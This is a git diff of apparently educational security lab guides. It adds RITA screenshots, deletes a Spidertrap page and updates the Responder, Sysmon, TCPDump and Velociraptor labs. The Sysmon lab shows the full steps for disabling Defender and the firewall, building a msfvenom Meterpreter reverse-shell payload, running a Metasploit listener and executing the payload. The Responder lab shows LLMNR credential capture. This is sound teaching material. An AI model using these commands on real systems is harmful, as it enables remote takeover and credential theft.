diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/advanced.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/advanced.png
new file mode 100644
index 00000000..153dd3ce
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/advanced.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_achunterhome.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_achunterhome.png
new file mode 100644
index 00000000..3601fc6f
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_achunterhome.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_achunterlogin.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_achunterlogin.png
new file mode 100644
index 00000000..d3e093fe
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_achunterlogin.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_beaconscore.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_beaconscore.png
new file mode 100644
index 00000000..c4368c99
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_beaconscore.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_beaconview.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_beaconview.png
new file mode 100644
index 00000000..43366b2a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_beaconview.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_datasetselection.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_datasetselection.png
new file mode 100644
index 00000000..cf2eb5c8
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_datasetselection.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_dns.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_dns.png
new file mode 100644
index 00000000..4568497e
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_dns.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_dnscat.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_dnscat.png
new file mode 100644
index 00000000..c118ff88
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_dnscat.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_dnsview.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_dnsview.png
new file mode 100644
index 00000000..b970fbc1
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_dnsview.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_navhtmlreport.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_navhtmlreport.png
new file mode 100644
index 00000000..cbdfa5f4
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_navhtmlreport.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_navindex.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_navindex.png
new file mode 100644
index 00000000..50e84e60
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_navindex.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_navintrolabs.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_navintrolabs.png
new file mode 100644
index 00000000..9fa4f345
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_navintrolabs.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_rita.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_rita.png
new file mode 100644
index 00000000..18e8fa2f
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_rita.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_selectingbeacon.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_selectingbeacon.png
new file mode 100644
index 00000000..5495f74b
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_selectingbeacon.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_vsagent.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_vsagent.png
new file mode 100644
index 00000000..14f6195b
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_vsagent.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_wrongplace.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_wrongplace.png
new file mode 100644
index 00000000..f299dde3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/rita_wrongplace.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/Responder/Responder.md b/IntroClassFiles/Tools/IntroClass/Responder/Responder.md
index 5238f40d..6fa3c6a2 100755
--- a/IntroClassFiles/Tools/IntroClass/Responder/Responder.md
+++ b/IntroClassFiles/Tools/IntroClass/Responder/Responder.md
@@ -1,50 +1,88 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+
+
+
 # Responder
 
 In this lab we are going to walk through how quickly an attacker can take advantage of a common misconfiguration to gain access to a system via a **weak** password.
 
 Specifically, we are looking to take advantage of **"LLMNR"**.  
 
-We will need to load our terminal and start responder.
+We will need to load our **linux terminal** and start responder.
 
-Let's get started by opening a **Kali** terminal.
 
-![](attachments/OpeningKaliInstance.png)
 
-Alternatively, you can click on the **Kali** icon in the taskbar.
 
-![](attachments/TaskbarKaliIcon.png)
+- **Double-click** `Ubuntu Shell` on Desktop
 
-Let’s become root:
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/196f7867-877b-4a37-bc02-1214e50e96a5" />
 
-<pre>sudo su -</pre>
 
-Before we start, we need to remove the existing **Responder** database. Do so by running the following:
+Next, we will navigate to the **Responder** directory:
 
-<pre>rm /usr/share/responder/Responder.db</pre>
+```bash
+cd ~/Intro_To_Security/Responder/
+```
 
 Now let’s start **Responder**:
 
-<pre>responder -I eth0</pre>
+```bash
+responder -I ens5
+```
 
 You should see this:
 
-![](attachments/responderrunning.png)
+<img width="313" height="541" alt="resp" src="https://github.com/user-attachments/assets/ca8c62ef-e845-4ad2-8a2a-59102a1e5d6d" />
+
+
+Let's open **Windows File Explorer** and put in the string ```\\Linux-IP\Noooo``` into the address bar at the top.
 
-Let's open **Windows File Explorer** and put in the string **"\\Noooo"** into the address bar at the top.
+<img width="502" height="55" alt="OpeningFileExplorer" src="https://github.com/user-attachments/assets/2de27ae0-5e58-4488-b7f3-ee6b313bec1e" />
 
-![](attachments/OpeningFileExplorer.png)
+<img width="929" height="488" alt="file_exp" src="https://github.com/user-attachments/assets/002bd08e-5d6a-4b31-9593-1feb0d979d47" />
 
-![](attachments/noooaccessbar.png)
 
-Switch back to your **Kali** terminal window.
+It will pop up a windows to write the credentials. Fill them and switch back to your **Linux** terminal window.
+
+<img width="374" height="337" alt="creds" src="https://github.com/user-attachments/assets/27799627-9ed3-4313-bd39-e7c6a0f841b7" />
+
 
 After a few moments, you should see some captured data showing up.  
 
 **Please note there may be an error.  That is OK.**
 
-![](attachments/captureddata.png)
+<img width="911" height="323" alt="file_exp_logs" src="https://github.com/user-attachments/assets/d2e3df52-44a3-4d6f-9ae0-af49c87e3898" />
+
+
+We can do the same thing from the Windows Terminal by running the following command:
+
+```bash
+net use * \\10.10.102.57\share
+```
+
+<img width="420" height="225" alt="term_attempt" src="https://github.com/user-attachments/assets/7caad37f-ad48-4bfe-9c01-83f456f3c98f" />
+
+As we can see we have the new captured data showing up.
 
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
+<img width="910" height="160" alt="testing_log" src="https://github.com/user-attachments/assets/19ba8e38-f46d-4e32-a402-1b036d9aee23" />
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/RITAIntroClass/RITA.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/PasswordSpray/PasswordSpray.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
 
 
 
@@ -127,3 +165,9 @@ Now, you can see just how bad LLMNR is!!!!
 */
 -->
 
+
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/Responder/attachments/OpeningFileExplorer.png b/IntroClassFiles/Tools/IntroClass/Responder/attachments/OpeningFileExplorer.png
index 7c3066b3..84c0f94e 100644
Binary files a/IntroClassFiles/Tools/IntroClass/Responder/attachments/OpeningFileExplorer.png and b/IntroClassFiles/Tools/IntroClass/Responder/attachments/OpeningFileExplorer.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/Responder/attachments/responderrunning.png b/IntroClassFiles/Tools/IntroClass/Responder/attachments/responderrunning.png
index 8e0f691b..b0f9b21e 100644
Binary files a/IntroClassFiles/Tools/IntroClass/Responder/attachments/responderrunning.png and b/IntroClassFiles/Tools/IntroClass/Responder/attachments/responderrunning.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/Spidertrap.md b/IntroClassFiles/Tools/IntroClass/Spidertrap.md
deleted file mode 100644
index c6afa225..00000000
--- a/IntroClassFiles/Tools/IntroClass/Spidertrap.md
+++ /dev/null
@@ -1,119 +0,0 @@
-![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
-
-Spidertrap
-==========
-
-Website
--------
-
-<https://github.com/adhdproject/spidertrap>
-
-Description
------------
-
-Trap web crawlers and spiders in an infinite set of dynamically
-generated webpages.
-
-Install Location
-----------------
-
-`/opt/spidertrap/`
-
-Usage
------
-
-`/opt/spidertrap$` **`python3 spidertrap.py --help`**
-
-        Usage: spidertrap.py [FILE]
-
-        FILE is file containing a list of webpage names to serve, one per line.
-        If no file is provided, random links will be generated.
-
-
-Example 1: Basic Usage
-----------------------
-
-Start Spidertrap by opening a terminal, changing into the Spidertrap
-directory, and typing the following:
-
-First, let's get your Kali Linux systems IP address
-
-`ifconfig`
-
-Next, let's cd to the propper directory:
-
-`cd /opt/spidertrap`
-
-Now, lets start it:
-
-`/opt/spidertrap$` **`python3 spidertrap.py`**
-
-        Starting server on port 8000...
-
-        Server started. Use <Ctrl-C> to stop.
-
-![image](https://github.com/user-attachments/assets/e978648f-f43d-4cff-acdb-f524a5e1a571)
-
-        
-    
-
-Then visit http://<YOUR_LINUX_IP>:8000 in a web
-browser. You should see a page containing randomly generated links. If
-you click on a link it will take you to a page with more randomly
-generated links.
-
-![](Spidertrap_files/image001.png) ![](Spidertrap_files/image002.png)
-
-Example 2: Providing a List of Links
-------------------------------------
-
-
-Start Spidertrap. This time give it a file to use to generate its links.
-
-You may need to press ctrl+c to kill your existing spidertrap session.
-
-Now, restart it with the following options:
-
-`/opt/spidertrap$` **`python3 spidertrap.py directory-list-2.3-big.txt`**
-
-        Starting server on port 8000...
-
-        Server started. Use <Ctrl-C> to stop.
-
-![image](https://github.com/user-attachments/assets/3cdc8570-9639-4dbd-9348-ed67f4c836a1)
-
-
-Then visit http://<YOUR_LINUX_IP>:8000 in a web
-browser. You should see a page containing links taken from the file. If
-you click on a link it will take you to a page with more links from the
-file.
-
-![](Spidertrap_files/image003.png) ![](Spidertrap_files/image004.png)
-
-Example 3: Trapping a Wget Spider
----------------------------------
-
-Follow the instructions in [Example 1: Basic Usage] or
-[Example 2: Providing a List of Links] to start Spidertrap. Then
-open a new Kali Linux terminal and tell wget to mirror the website. Wget will run
-until either it or Spidertrap is killed. Type Ctrl-c to kill wget.
-
-`$` **`sudo wget -m http://127.0.0.1:8000`**
-
-        --2013-01-14 12:54:15-- http://127.0.0.1:8000/
-
-        Connecting to 127.0.0.1:8000... connected.
-
-        HTTP request sent, awaiting response... 200 OK
-
-        <<<snip>>>
-
-        HTTP request sent, awaiting response... ^C
-
-
-![image](https://github.com/user-attachments/assets/8369ef4c-1298-4321-a4b2-40a94cd2de16)
-
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
-
diff --git a/IntroClassFiles/Tools/IntroClass/Sysmon/Sysmon.md b/IntroClassFiles/Tools/IntroClass/Sysmon/Sysmon.md
index 72f8be7f..c545f659 100755
--- a/IntroClassFiles/Tools/IntroClass/Sysmon/Sysmon.md
+++ b/IntroClassFiles/Tools/IntroClass/Sysmon/Sysmon.md
@@ -3,6 +3,7 @@
 
 # Sysmon
 
+# Windows VM
 In this lab we will be looking at what an attacker can do with valid accounts.  
 
 To learn more about this attack check out the following:
@@ -16,130 +17,153 @@ Here are just some groups that have used this attack:
 
 Let’s begin by disabling **Defender**. Simply run the following from an **Administrator PowerShell** prompt:
 
-![](attachments/OpeningPowershell.png)
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-15" src="https://github.com/user-attachments/assets/bb7c958d-9879-44d3-a6e2-441139a94caa" />
 
 Next, run the following command in the **Powershell** terminal:
 
-<pre>Set-MpPreference -DisableRealtimeMonitoring $true</pre>
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
 
 ![](attachments/applocker_disabledefender.png)
+
 This will disable **Defender** for this session.
 
 If you get angry red errors, that is **Ok**, it means **Defender** is not running.
 
 Next, lets ensure the firewall is disabled. In a Windows Command Prompt.
 
-<pre> netsh advfirewall set allprofiles state off</pre>
+```ps
+netsh advfirewall set allprofiles state off
+```
 
 
 Next, set a password for the Administrator account that you can remember
 
-<pre>net user Administrator password1234</pre>
+```ps
+net user Administrator password1234
+```
 
 Please note, that is a very bad password.  Come up with something better. But, please remember it.
 
-Before we move on from our Powershell window, lets get our IP by running the following command:
-
-<pre>ipconfig</pre>
-
-![](attachments/powershellipconfig.png)
-
-**REMEMBER - YOUR IP WILL BE DIFFERENT**
-
-Write this IP down so we can use it again later.
-
-Let's continue by opening a **Kali** terminal
-
-![](attachments/OpeningKaliInstance.png)
 
-Alternatively, you can click on the **Kali** icon in the taskbar.
+Now we need a **Linux Terminal**
 
-![](attachments/TaskbarKaliIcon.png)
 
+- **Double-click** `Ubuntu Shell` on Desktop
 
-We need to run the following commands in order to mount our remote system to the correct directory:
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/196f7867-877b-4a37-bc02-1214e50e96a5" />
 
-<pre>sudo su -</pre>
 
-<pre>mount -t cifs //[Your IP Address]/c$ /mnt/windows-share -o username=Administrator,password=password1234</pre>
 
-**If you are at CyberBay, you can use the password we found for Dennis.  What was it?**
+Become root:
 
-**REMEMBER - YOUR IP ADDRESS AND PASSWORD WILL BE DIFFERENT.**
+```bash
+sudo su -
+```
 
-If you see the following error, it means that the device is already mounted.
 
-![](attachments/mounterror.png)
+Before we run the next commands, we need to get the **IP** of our **Linux System**. Lets do so by running the following:
 
-If this is the case, ignore it.
+```bash
+ifconfig
+```
 
-Run the following command to navigate into the mounted directory:
-
-<pre>cd /mnt/windows-share</pre>
-
-Before we run the next commands, we need to get the IP of our Kali System (AKA our Linux IP Adress). Lets do so by running the following:
-
-<pre>ifconfig</pre>
-
-![](attachments/ifconfig.png)
+<img width="716" height="175" alt="Get_IPLinux" src="https://github.com/user-attachments/assets/55ffa0a2-0502-4331-ad4e-720b1c1f4205" />
 
 **REMEMBER: YOUR IP WILL BE DIFFERENT**
 
 Run the following commands to start a simple backdoor and backdoor listener: 
 
-<pre>msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[Your Linux IP Address] lport=4444 -f exe -o /mnt/windows-share/TrustMe.exe</pre>
+```bash
+cd /tmp/
+```
+
+```bash
+msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[Your Linux IP Address] lport=4444 -f exe > /tmp/TrustMe.exe
+```
 
-Let's start the **Metasploit** Handler.  Open a new **Kali** terminal by clicking the **Kali** icon in the taskbar.
+Let's start the **Metasploit** Handler. We need another **Linux Terminal**
 
-![](attachments/TaskbarKaliIcon.png)
+- **Double-click** `Ubuntu Shell` on Desktop
 
-Let's become root.
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/196f7867-877b-4a37-bc02-1214e50e96a5" />
 
-<pre>sudo su -</pre>
 
 Now let's start the **Metasploit** Handler
 
-<pre>msfconsole -q</pre>
+```bash
+sudo msfconsole -q
+```
 
 We are going to run the following commands to correctly set the parameters:
 
-<pre>use exploit/multi/handler</pre>
+```bash
+use exploit/multi/handler
+```
 
-<pre>set PAYLOAD windows/meterpreter/reverse_tcp</pre>
+```bash
+set PAYLOAD windows/meterpreter/reverse_tcp
+```
 
-<pre>set LHOST [Your Linux IP Address]</pre>
+```bash
+set LHOST [Your Linux IP Address]
+```
 
 Remember, **Your IP will be different!**
 
-<pre>exploit</pre>
+```bash
+exploit
+```
 
 It should look like this:
 
-![](attachments/msfconsole.png)
+<img width="687" height="206" alt="2026-02-23_15-38" src="https://github.com/user-attachments/assets/71226123-2163-4237-8173-c7586de81ee7" />
+
+Going back to our **Powershell** terminal, copy the file over from **Linux**
 
-We will need to open a **"cmd.exe"** terminal as **Administrator**.
+```ps
+cd .\Desktop\
+```
 
-![](attachments/OpeningWindowsCommandPrompt.png)
+```ps
+scp ubuntu@linux.cloudlab.lan:/tmp/TrustMe.exe .
+```
 
-<pre>cd \IntroLabs</pre>
 
-<pre>Sysmon64.exe -accepteula -i sysmonconfig-export.xml</pre>
+Now we will need to open a **"cmd.exe"** terminal as **Administrator**.
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/e8526cf1-0ed9-48f6-bd3f-f56af7536463" />
+
+
+```cmd
+cd \IntroLabs
+```
+
+```cmd
+Sysmon64.exe -accepteula -i sysmonconfig-export.xml
+```
 
 It should look like this:
 
-![](attachments/sysmonexe.png)
+<img width="598" height="354" alt="2026-03-13_16-37" src="https://github.com/user-attachments/assets/d8175d3c-e72a-4d57-bdd6-65409afb838a" />
+
 
-let's run the following commands to run the **"TrustMe.exe"** file.
+Let's run the following commands to run the **"TrustMe.exe"** file.
 
-<pre>cd \</pre>
+```cmd
+cd \Users\Administrator\Desktop
+```
  
 Then run it with the following:
 
- <pre>TrustMe.exe</pre>
+```cmd
+TrustMe.exe
+```
 
-Back at your Kali terminal, you should have a metasploit session!
+Back at your **Linux terminal**, you should have a metasploit session!
 
-![](attachments/meterpretersession.png)
+<img width="920" height="136" alt="2026-03-13_16-38" src="https://github.com/user-attachments/assets/35c77cf6-ec9a-4379-a359-c1984f221b72" />
 
 Now, we need to view the Sysmon events for this malware:
 
@@ -157,24 +181,26 @@ You'll have to scroll down a bit until you find the **Sysmon** folder.
 
 Start at the top and work down through the logs, you should see your **malware** executing.  Please note your paths may be different.
 
-![](attachments/logs.png)
 
-![](attachments/processcreateview.png)
+<img width="1325" height="938" alt="2026-03-13_16-45" src="https://github.com/user-attachments/assets/e1038335-5dce-4384-a98d-5683adda1608" />
 
-***
-***Continuing on to the next Lab?***
 
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
 
-***Finished with the Labs?***
 
 
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/WebTesting.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/RITAIntroClass/RITA.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
 Please be sure to destroy the lab environment!
 
 [Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
 
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
 ---
 
 
diff --git a/IntroClassFiles/Tools/IntroClass/TCPDump/TCPDump.md b/IntroClassFiles/Tools/IntroClass/TCPDump/TCPDump.md
index 82155fe2..ec553b30 100644
--- a/IntroClassFiles/Tools/IntroClass/TCPDump/TCPDump.md
+++ b/IntroClassFiles/Tools/IntroClass/TCPDump/TCPDump.md
@@ -134,7 +134,7 @@ Here is a great resource to try some more options in **TCPDump**:
 
 ***                                                                 
 
-<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/WindowsCLI/WindowsCLI.md)</i></b>
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/WebLogReview/WebLogReview.md)</i></b>
 
 <b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/Memory/MemoryAnalysis(Volatility).md)</i></b>
 
@@ -167,5 +167,6 @@ Please be sure to destroy the lab environment!
 
 
 
+
 
 
diff --git a/IntroClassFiles/Tools/IntroClass/Velociraptor/Velociraptor.md b/IntroClassFiles/Tools/IntroClass/Velociraptor/Velociraptor.md
index e9994ef9..7e3b7e30 100644
--- a/IntroClassFiles/Tools/IntroClass/Velociraptor/Velociraptor.md
+++ b/IntroClassFiles/Tools/IntroClass/Velociraptor/Velociraptor.md
@@ -21,84 +21,94 @@ Let's get started.
 
 Open a **Windows command prompt**.
 
-![](attachment/openingcommandprompt%20-%20Copy.png)
+<img width="294" height="296" alt="2026-02-07_17-05" src="https://github.com/user-attachments/assets/8957ed22-91e0-4e05-903f-e93aefd6cb19" />
+
 
 When the terminal opens, navigate to the appropriate directory by using the following command:
 
-<pre>cd \IntroLabs</pre>
+```bash
+cd \IntroLabs
+```
 
 For this installation, we are going to set up **Velociraptor** as a standalone deployment.  This means the server and the client will be run on the same system.
 
 Within the command prompt, run the following command:
 
-<pre>velociraptor-v0.72.3-windows-amd64.exe config generate -i</pre>
-
-When it asks about the OS, please choose **Windows**.  It should be the default.
+```bash
+velociraptor-v0.75.6-windows-amd64.exe config generate -i
+```
 
-![](attachment/velociraptor_chooseos.png)
+When it asks about the **Deployment Type**, choose **Self Signed SSL**
 
-When it asks about the Path to the datastore, **just hit enter**.  This will keep the default.
+<img width="610" height="111" alt="2026-03-15_11-02" src="https://github.com/user-attachments/assets/e34c0e98-6fec-4b14-9d29-2a1abd949cd2" />
 
-![](attachment/velociraptor_datastorepath.png)
+When it asks about the **OS**, please choose **Windows**.
 
-When it asks about the SSL certs, **just hit enter**.  It will choose the default of Self Signed SSL.
+<img width="557" height="120" alt="2026-03-15_11-04" src="https://github.com/user-attachments/assets/567ec56e-7ed2-403d-9d2c-10babf2d2661" />
 
-![](attachment/velociraptor_sslcert.png)
+When it asks about the **Path to the datastore**, **just hit enter**.  This will keep the default.
 
+<img width="906" height="111" alt="2026-03-15_11-06" src="https://github.com/user-attachments/assets/c5a2adcf-6a82-43aa-a593-1826c4f536e4" />
 
-When it asks about the DNS name, **just hit enter**.  It will set the default to localhost.  This will work fine as we are just running this locally.
+When it asks about the path to the **logs directory**, **just hit enter** to accept the default.
 
-![](attachment/velociraptor_publicdns.png)
+<img width="643" height="94" alt="2026-03-15_11-09" src="https://github.com/user-attachments/assets/2189706f-bc81-4734-afdf-f468a488964a" />
 
-For the default ports, once again, **just hit enter** to accept 8000 and 8889 as the defaults.
+When it asks about the **PKI Certificate Expiration**, **just hit enter** to accept the default.
 
-![](attachment/velociraptor_frontendport.png)
+<img width="606" height="171" alt="2026-03-15_11-10" src="https://github.com/user-attachments/assets/8acc7f0f-eb75-4c0e-b8f8-cd2b53d6d384" />
 
-If prompted about using Websocket, enter **"No"**
+When it asks about the **Registry for Client Writeback**, **just hit enter** to accept the default.
 
-![](attachment/velociraptor_websocket.png)
+<img width="803" height="164" alt="2026-03-15_11-10" src="https://github.com/user-attachments/assets/930e3b8b-986c-42d1-8741-cc4d015169a7" />
 
-If prompted about using the registry to store writeback files, please enter **"N"**
+When it asks about the **DNS name**, **just hit enter**.  It will set the default to localhost.  This will work fine as we are just running this locally.
 
-![](attachment/velociraptor_registrywriteback.png)
+<img width="581" height="77" alt="2026-03-15_11-14" src="https://github.com/user-attachments/assets/6a718c5c-e7a6-49b8-a42f-1c0162939c21" />
 
-When asked about which **DynDNS** provider is used, select **None** and press enter.
+When asked about which **DNS Type** is used, select **None** and press enter.
 
-![](attachment/velociraptor_dyndns.png)
+<img width="827" height="113" alt="2026-03-15_11-14" src="https://github.com/user-attachments/assets/12fa7d6c-4bfb-4f6f-ad32-eb9bd035a387" />
 
-For the GUI username, please **just hit enter** to end.
+If prompted about using **Experimental Websocket**, enter **"No"**
 
-![](attachment/velociraptor_guiusername.png)
+<img width="729" height="153" alt="2026-03-15_11-17" src="https://github.com/user-attachments/assets/db146be1-8ec6-4c29-bf86-ac1591dd12b3" />
 
-When it asks about the path to the logs directory, **just hit enter** to accept the default.
+For the **default ports**, once again, **just hit enter** twice to accept 8000 and 8889 as the defaults.
 
-![](attachment/velociraptor_pathtologs.png)
+<img width="399" height="114" alt="2026-03-15_11-19" src="https://github.com/user-attachments/assets/fc2b01b0-e371-4866-b672-8dcc193b6bd8" />
 
-If it asks if you would to **"restrict VQL"** functionality on the server, please enter **"N"**
+When it asks about the **Username and Password**, **just hit enter** twice to leave them empty.
 
-![](attachment/velociraptor_vqlfunct.png)
+<img width="435" height="143" alt="2026-03-15_11-19" src="https://github.com/user-attachments/assets/d01aaf37-bd18-4e19-b5b5-e6983fb741eb" />
 
-When it asks where to write the server and client configs, **just hit enter** on both prompts to accept the defaults.
+When it asks about the **Name of file** of the config file, **just hit enter** to accept the default.
 
-![](attachment/velociraptor_configs.png)
+<img width="325" height="75" alt="2026-03-15_11-24" src="https://github.com/user-attachments/assets/b4bfd136-550c-4e14-9275-d227566984d0" />
 
 Let’s add a **GUI** user.
 
-<pre>velociraptor-v0.72.3-windows-amd64.exe --config server.config.yaml user add root --role administrator</pre>
+```bash
+velociraptor-v0.75.6-windows-amd64.exe --config server.config.yaml user add root --role administrator
+```
 
 When it asks for the password, please choose a password you will remember.
 
 When finished, it should look similar to 
 
-![](attachment/velociraptor_entergui.png)
+<img width="1063" height="239" alt="2026-03-15_11-24" src="https://github.com/user-attachments/assets/76c803ea-dc16-4f10-8184-385d1f121968" />
 
 Lets run the **msi** to load the proper files to the proper directories:
 
-<pre>velociraptor-v0.72.3-windows-amd64.msi</pre>
+```bash
+velociraptor-v0.75.6-windows-amd64.msi
+```
 
 Time to start the server.
 
-<pre>velociraptor-v0.72.3-windows-amd64.exe --config server.config.yaml frontend -v</pre>
+```bash
+velociraptor-v0.75.6-windows-amd64.exe --config server.config.yaml frontend -v
+```
 
 This will take some time, be patient.
 
@@ -130,21 +140,27 @@ Next, we need to start the client. Lucky for us, it is the same executable.
 
 We will need to open another **Windows Command Prompt**. Right click on the terminal icon in the task bar, and select **"command prompt"**:
 
-![](attachment/velociraptor_openanotherprompt.png)
+<img width="294" height="296" alt="2026-02-07_17-05" src="https://github.com/user-attachments/assets/8957ed22-91e0-4e05-903f-e93aefd6cb19" />
 
 Then Navigate to the **IntroLabs** directory.
 
-<pre>cd \IntroLabs</pre>
+```bash
+cd \IntroLabs
+```
 
 We will need to start the client.  To do this will need to run the **MSI** first.
 
-<pre>velociraptor-v0.72.3-windows-amd64.msi</pre>
+```bash
+velociraptor-v0.75.6-windows-amd64.msi
+```
 
 When you get the pop up, select Run.  This will install the proper libraries and files.
 
 Next, we will start the client.
 
-<pre>velociraptor-v0.72.3-windows-amd64.exe --config client.config.yaml client -v</pre>
+```bash
+velociraptor-v0.75.6-windows-amd64.exe --config server.config.yaml client -v
+```
 
 It will look something like this:
 
@@ -156,7 +172,7 @@ Now, let’s go back to the Velociraptor GUI and select the Home button in the u
 
 You should see **one** connected client.
 
-![](attachment/velociraptor_connectedclients.png)
+<img width="910" height="664" alt="2026-03-15_11-56" src="https://github.com/user-attachments/assets/e86d04c8-64a1-4ff4-9380-33e5f79ade88" />
 
 Now let’s look at what we can do with this.
 
@@ -186,16 +202,20 @@ Please click on the **PowerShell** box and select **Cmd**.
 
 ![](attachment/velociraptor_powershelldropdown.png)
 
-Now, enter **netstat -naob** in the cmd box and select **"Launch"**.
+Now, enter `netstat -naob` in the cmd box and select **"Launch"**.
 
 
 This will not display the results right away. To see the results, select the **"Eye"** icon:
 
 ![](attachment/velociraptor_eye.png)
 
-Now you can see the results:
+Now you can see the results, click **Active Connections**:
+
+<img width="453" height="259" alt="2026-03-15_11-56" src="https://github.com/user-attachments/assets/8f3e9ae5-9eb5-491a-aa8b-435692cde8e8" />
+
+Now click the **Text** tab
 
-![](attachment/velociraptor_seeresults.png)
+<img width="862" height="802" alt="2026-03-15_12-03" src="https://github.com/user-attachments/assets/4d9f5fb0-1aa6-4ab0-89b9-c1669ab93af4" />
 
 Let’s do a Hunt.   Please select the Hunt icon.
 
